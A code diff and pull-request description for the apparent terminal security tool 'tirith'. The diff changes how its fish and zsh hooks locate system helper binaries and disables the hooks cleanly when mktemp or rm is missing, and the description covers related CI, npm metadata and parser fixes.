-    set -g _TIRITH_SH_BIN /usr/bin/sh
-end
-set -g _TIRITH_BASH_TIMEOUT_BIN ""
-if test -f /bin/bash; and test -x /bin/bash
-    set -g _TIRITH_BASH_TIMEOUT_BIN /bin/bash
-else if test -f /usr/bin/bash; and test -x /usr/bin/bash
-    set -g _TIRITH_BASH_TIMEOUT_BIN /usr/bin/bash
-end
+
+set -g _TIRITH_MKTEMP_BIN (_tirith_resolve_helper mktemp /usr/bin/mktemp /bin/mktemp)
+set -g _TIRITH_RM_BIN (_tirith_resolve_helper rm /bin/rm /usr/bin/rm)
+set -g _TIRITH_WC_BIN (_tirith_resolve_helper wc /usr/bin/wc /bin/wc)
+set -g _TIRITH_ENV_BIN (_tirith_resolve_helper env /usr/bin/env /bin/env)
+set -g _TIRITH_SH_BIN (_tirith_resolve_helper sh /bin/sh /usr/bin/sh)
+set -g _TIRITH_BASH_TIMEOUT_BIN (_tirith_resolve_helper bash /bin/bash /usr/bin/bash)
 set -g _TIRITH_V3_HELPERS_READY 1
 for helper in "$_TIRITH_MKTEMP_BIN" "$_TIRITH_RM_BIN" "$_TIRITH_WC_BIN" \
         "$_TIRITH_ENV_BIN" "$_TIRITH_SH_BIN"
     if not string match -q '/*' -- "$helper"; or not test -f "$helper"; or not test -x "$helper"
         set -g _TIRITH_V3_HELPERS_READY 0
     end
+end
+
+# Legacy preflight also requires private capture files. If these prerequisites
+# are absent at startup, leave Enter/paste bindings intact instead of installing
+# a hook that discards every command. Runtime capture failures still block.
+if status is-interactive
+    and begin
+        test -z "$_TIRITH_MKTEMP_BIN"; or test -z "$_TIRITH_RM_BIN"
+    end
+    builtin printf '%s\n' 'tirith: mktemp or rm unavailable; fish hooks disabled — install these helpers and restart the shell' >&2
+    set -g TIRITH_STATUS off
+    set -e _TIRITH_FISH_LOADED
+    return 0
 end
 
 # Receipt protocol state. Registration itself happens further down, after the

--- a/shell/lib/zsh-hook.zsh
+++ b/shell/lib/zsh-hook.zsh
@@ -34,28 +34,34 @@ if [[ -z "$_TIRITH_BIN" || ! -x "$_TIRITH_BIN" ]]; then
 fi
 
 # Protocol-v3 callbacks run after arbitrary commands may have changed PATH.
-# Pin every external helper they use to a fixed system location now, and only
-# advertise receipt support when the complete helper set is available.
-_TIRITH_MKTEMP_BIN=""
-[[ -f /usr/bin/mktemp && -x /usr/bin/mktemp ]] && _TIRITH_MKTEMP_BIN=/usr/bin/mktemp
-[[ -z "$_TIRITH_MKTEMP_BIN" && -f /bin/mktemp && -x /bin/mktemp ]] \
-  && _TIRITH_MKTEMP_BIN=/bin/mktemp
-_TIRITH_RM_BIN=""
-[[ -f /bin/rm && -x /bin/rm ]] && _TIRITH_RM_BIN=/bin/rm
-[[ -z "$_TIRITH_RM_BIN" && -f /usr/bin/rm && -x /usr/bin/rm ]] \
-  && _TIRITH_RM_BIN=/usr/bin/rm
-_TIRITH_WC_BIN=""
-[[ -f /usr/bin/wc && -x /usr/bin/wc ]] && _TIRITH_WC_BIN=/usr/bin/wc
-[[ -z "$_TIRITH_WC_BIN" && -f /bin/wc && -x /bin/wc ]] \
-  && _TIRITH_WC_BIN=/bin/wc
-_TIRITH_ENV_BIN=""
-[[ -f /usr/bin/env && -x /usr/bin/env ]] && _TIRITH_ENV_BIN=/usr/bin/env
-[[ -z "$_TIRITH_ENV_BIN" && -f /bin/env && -x /bin/env ]] \
-  && _TIRITH_ENV_BIN=/bin/env
-_TIRITH_SH_BIN=""
-[[ -f /bin/sh && -x /bin/sh ]] && _TIRITH_SH_BIN=/bin/sh
-[[ -z "$_TIRITH_SH_BIN" && -f /usr/bin/sh && -x /usr/bin/sh ]] \
-  && _TIRITH_SH_BIN=/usr/bin/sh
+# Prefer system helpers, then search the source-time PATH for non-FHS systems
+# (NixOS/Guix). Inspect files directly to ignore stale command hashes, aliases
+# and functions. Relative/empty PATH entries must never become helper pins.
+_tirith_resolve_helper() {
+  local name="$1" candidate directory
+  shift
+  for candidate in "$@"; do
+    if [[ "$candidate" == /* && -f "$candidate" && -x "$candidate" ]]; then
+      builtin print -r -- "$candidate"
+      return 0
+    fi
+  done
+  for directory in "${path[@]}"; do
+    [[ "$directory" == /* ]] || continue
+    candidate="${directory%/}/$name"
+    if [[ -f "$candidate" && -x "$candidate" ]]; then
+      builtin print -r -- "$candidate"
+      return 0
+    fi
+  done
+  return 1
+}
+
+_TIRITH_MKTEMP_BIN="$(_tirith_resolve_helper mktemp /usr/bin/mktemp /bin/mktemp)" || _TIRITH_MKTEMP_BIN=""
+_TIRITH_RM_BIN="$(_tirith_resolve_helper rm /bin/rm /usr/bin/rm)" || _TIRITH_RM_BIN=""
+_TIRITH_WC_BIN="$(_tirith_resolve_helper wc /usr/bin/wc /bin/wc)" || _TIRITH_WC_BIN=""
+_TIRITH_ENV_BIN="$(_tirith_resolve_helper env /usr/bin/env /bin/env)" || _TIRITH_ENV_BIN=""
+_TIRITH_SH_BIN="$(_tirith_resolve_helper sh /bin/sh /usr/bin/sh)" || _TIRITH_SH_BIN=""
 _TIRITH_V3_HELPERS_READY=1
 for _tirith_helper in "$_TIRITH_MKTEMP_BIN" "$_TIRITH_RM_BIN" "$_TIRITH_WC_BIN" \
   "$_TIRITH_ENV_BIN" "$_TIRITH_SH_BIN"; do
@@ -63,6 +69,17 @@ for _tirith_helper in "$_TIRITH_MKTEMP_BIN" "$_TIRITH_RM_BIN" "$_TIRITH_WC_BIN" 
     || _TIRITH_V3_HELPERS_READY=0
 done
 unset _tirith_helper
+
+# Legacy preflight also requires private capture files. If these prerequisites
+# are absent at startup, leave the user's Enter/paste bindings intact instead
+# of installing a hook that discards every command. Runtime capture failures
+# still block: they must not provide a way to bypass an already-active hook.
+if [[ -o interactive && ( -z "$_TIRITH_MKTEMP_BIN" || -z "$_TIRITH_RM_BIN" ) ]]; then
+  builtin print -u2 -r -- "tirith: mktemp or rm unavailable; zsh hooks disabled — install these helpers and restart the shell"
+  TIRITH_STATUS=off
+  unset _TIRITH_ZSH_LOADED
+  return 0
+fi
 
 # One receipt protocol instance per sourced hook. It is deliberately
 # non-exported; only individual Tirith subprocesses receive it. Older binaries


### PR DESCRIPTION
Daily ThreatDB builds fail when npm serves package metadata as `application/octet-stream`. The source-pin watcher also fails after discovering new revisions because its fake source data is tied to the production pins, and it requires an unconfigured PR token. This fixes those failures and the reported shell regressions in 0.4.1.

- Accept npm HTTP 200 octet-stream metadata only after JSON, package identity, version and size validation; preserve the served media type in provenance.
- Give fetch tests an immutable fixture manifest. Validate candidate pins with a read-only token, then publish their review PR from a separate job using the optional dedicated token or `GITHUB_TOKEN`. Refresh existing PRs correctly and refuse proposals validated against superseded source code or pins.
- Resolve shell helpers once from absolute PATH entries on non-FHS systems, preserving fixed-system-path preference. Leave Enter bindings intact with an explicit disabled status when capture helpers are missing at startup.
- Recognize literal home paths, POSIX test syntax and alias listings without relaxing dynamic argv/config checks. Keep Go package patterns out of generic URL detection. Preserve tracked aliases across listing-only commands.
- Recognize mise/rtx shims belonging to the running installation without executing them. Treat two absent v2 indexes as an expected legacy fallback, retaining integrity and transport diagnostics.

Closes #235, closes #236, closes #237, closes #238, closes #239, closes #240.

The behavior reported in #223 is already fixed in 0.4.1: verified in isolated CLI runs that `policy effective --json` reports neutralized repository `allowlist_rules`, repository rules cannot suppress a pipe-to-shell finding, and the same trusted user rule can. The README also documents URL-only matching: command-shaped patterns such as `launchctl list` are inert, while URL/path patterns use normalized exact matching. No additional relaxation is introduced.

Validation:

- All 90 compiler unit tests pass, including registry metadata and identity regressions.
- The full pinned live registry fetch passes for 1,011 packages and 40.9 MB of responses within the existing 420-second cap. The reported npm package resolves successfully; the octet-stream header case is covered by deterministic tests.
- All six parser regression tests pass under Cargo. Both targeted network-policy tests and all three shell-helper portability tests pass.
- Fetch orchestration, six source-pin tests, actionlint, shell syntax, formatting and mirrored hook checks pass. Today's selected OpenSSF revision also fits the existing file and byte limits.
- An isolated real client update downloads the published legacy DB without the absent-v2 warning, and health confirms its Ed25519 signature.
- Full CI passes on Linux, macOS, Windows and Rust 1.83, including the production capsule receipt. All 13 fuzz targets, benchmarks and release-package checks pass on the final commit (9d45227f).

The v0.4.1 release already exists. This PR does not enable the separately gated v2 publishing channel or replace release assets. Fresh [production publishing](https://github.com/sheeki03/tirith/actions/runs/34595445562) and [source-pin watcher](https://github.com/sheeki03/tirith/actions/runs/34595385383) runs succeeded; the watcher also needed the timestamp correction in #244. The latest signed database passed client signature, size and SHA-256 verification. PRs opened by the built-in token may require approval of their pending workflow runs before merging.
